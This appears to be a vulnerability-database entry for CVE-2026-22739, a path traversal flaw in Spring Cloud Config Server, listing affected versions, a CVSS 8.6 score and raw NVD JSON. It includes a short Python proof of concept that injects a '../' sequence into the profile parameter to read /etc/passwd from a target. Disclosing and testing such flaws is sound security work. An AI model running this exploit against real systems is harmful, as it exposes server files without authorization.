Security Vulnerability Report
中文
CVE-2026-22739 CVSS 8.6 HIGH

CVE-2026-22739

Published: 2026-03-24 01:17:01
Last Modified: 2026-03-24 15:53:48
Source: [email protected]

Description

Vulnerability in Spring Cloud when substituting the profile parameter from a request made to the Spring Cloud Config Server configured to the native file system as a backend, because it was possible to access files outside of the configured search directories.This issue affects Spring Cloud: from 3.1.X before 3.1.13, from 4.1.X before 4.1.9, from 4.2.X before 4.2.3, from 4.3.X before 4.3.2, from 5.0.X before 5.0.2.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Spring Cloud 3.1.X < 3.1.13
Spring Cloud 4.1.X < 4.1.9
Spring Cloud 4.2.X < 4.2.3
Spring Cloud 4.3.X < 4.3.2
Spring Cloud 5.0.X < 5.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-22739: Spring Cloud Config Server Path Traversal import requests def check_vulnerability(target_url): # The endpoint structure usually follows: /{application}/{profile}/{label} # Attempt to read /etc/passwd using path traversal traversal_sequence = "../../../../../../../etc/passwd" # Construct the full URL # Assuming 'app' as application and 'main' as label for demonstration exploit_url = f"{target_url}/app/{traversal_sequence}/main" try: response = requests.get(exploit_url, timeout=5) if response.status_code == 200 and "root:" in response.text: print(f"[+] Target {target_url} is vulnerable!") print(f"[+] Retrieved content:\n{response.text[:200]}") else: print(f"[-] Target {target_url} appears not vulnerable or error occurred.") except Exception as e: print(f"[!] Error connecting to target: {e}") if __name__ == "__main__": target = "http://localhost:8888" # Replace with actual target check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22739", "sourceIdentifier": "[email protected]", "published": "2026-03-24T01:17:00.910", "lastModified": "2026-03-24T15:53:48.067", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in Spring Cloud when substituting the profile parameter from a request made to the Spring Cloud Config Server configured to the native file system as a backend, because it was possible to access files outside of the configured search directories.This issue affects Spring Cloud: from 3.1.X before 3.1.13, from 4.1.X before 4.1.9, from 4.2.X before 4.2.3, from 4.3.X before 4.3.2, from 5.0.X before 5.0.2."}, {"lang": "es", "value": "Vulnerabilidad en Spring Cloud al sustituir el parámetro de perfil de una solicitud realizada al Spring Cloud Config Server configurado para el sistema de archivos nativo como backend, porque era posible acceder a archivos fuera de los directorios de búsqueda configurados. Este problema afecta a Spring Cloud: desde 3.1.X antes de 3.1.13, desde 4.1.X antes de 4.1.9, desde 4.2.X antes de 4.2.3, desde 4.3.X antes de 4.3.2, desde 5.0.X antes de 5.0.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://spring.io/security/cve-2026-22739", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.